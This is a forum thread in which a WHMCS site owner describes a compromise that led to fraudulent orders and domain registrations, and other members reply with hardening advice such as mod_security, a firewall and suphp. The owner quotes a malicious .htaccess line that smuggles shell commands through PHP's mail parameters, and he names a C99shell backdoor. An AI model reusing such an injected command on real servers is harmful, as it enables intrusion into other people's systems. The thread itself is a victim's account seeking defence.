Jump to content

Website hacked, whmcs took over and bunch of domains regisered

raymon

By raymon
in Using WHMCS

 Share

Recommended Posts

raymon Junior Member

raymon

Posted
Posted

I am facing really hard time with my account. It has been hacked by some deadbeat who created bunch of orders and registered some domain names. I wonder if there is an issue with loophole or something with whmcs. My whmcs says I should upgrade but HostingZoom offers whmcs 4.4.2 as their latest version.

 

All I know that I ended up with my website inaccessible. It came be permission error. When I tried to access my website (on which whmcs is installed) I got a permission error.

I emailed my host Hosting Zoom and they said I have invalid instruction in .htaccess

This is what I got in htaccess:

php_value mail.force_extra_parameters '-t && ls /home/ > /home/webiano/public_html/result.txt'

 

Then I found a punch of php files which I transferred to my local computer. 3 files were instantly removed by Microsoft Security Essentials and they are called the following:

VirTool:JS/Obfuscator.AQ

VirTool:JS/Obfuscator.BO

Backdoor:PHP/C99shell.G

 

The rest of the files are not detected by Security Essentials but they contain suspcious data/language progs.

 

1) Does any one know how to prevent such malicious take over in the future? any suggestions?

2) I want to restrict login through whmcs to only my range (my country). Is this possible?

3) Do you think imposing a password (htaccess) on the directory of whmcs would make it harder for the hacker to access my whmcs account?

 

I am really unsure how to defend myself. This takeover probably cost me a lot basically because of registered domains $70 and it left me really feeling unsafe regarding the whole thing. I don't know how to approach this issue and prevent future incidents. An insight would be really appreciated.

0
Link to comment
Share on other sites
brianoz Senior Member

brianoz

Posted
Posted

There are a lot of ways to defend yourself against this sort of attack, but frankly, since you don't understand what you're doing, you'd be much better looking for a hosted WHMCS solution - where someone else runs your WHMCS on their server and keeps it secure for you.

 

Hope you don't mind me being blunt; I really think this would be the safest thing for you maybe for a year or two until you understand all the issues.

 

It looks a little to me like your host isn't secure either; you should be looking for things like, at an absolute minimum:

  • mod_security
  • CSF firewall, with auto-block for hackers who hit mod_security rules a lot
  • suphp or fastcgi so php doesn't run as a common user
  • security hardening - generally

 

There are other things like virus/security scanning of uploads which is also a really good idea.

0
Link to comment
Share on other sites
cmsplushosting Member

cmsplushosting

Posted
Posted

I agree with this one... Without prior knowledge on administrating or the know-how on keeping stuff secure, a hosted version would be your best bet; managed by someone else or a qualified company to handle your server management tasks. Having this behind you will help immensly.

There are a lot of ways to defend yourself against this sort of attack, but frankly, since you don't understand what you're doing, you'd be much better looking for a hosted WHMCS solution - where someone else runs your WHMCS on their server and keeps it secure for you.

 

Hope you don't mind me being blunt; I really think this would be the safest thing for you maybe for a year or two until you understand all the issues.

 

It looks a little to me like your host isn't secure either; you should be looking for things like, at an absolute minimum:

  • mod_security
  • CSF firewall, with auto-block for hackers who hit mod_security rules a lot
  • suphp or fastcgi so php doesn't run as a common user
  • security hardening - generally

 

There are other things like virus/security scanning of uploads which is also a really good idea.

0
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...

Important Information

By using this site, you agree to our Terms of Use & Guidelines and understand your posts will initially be pre-moderated

  I accept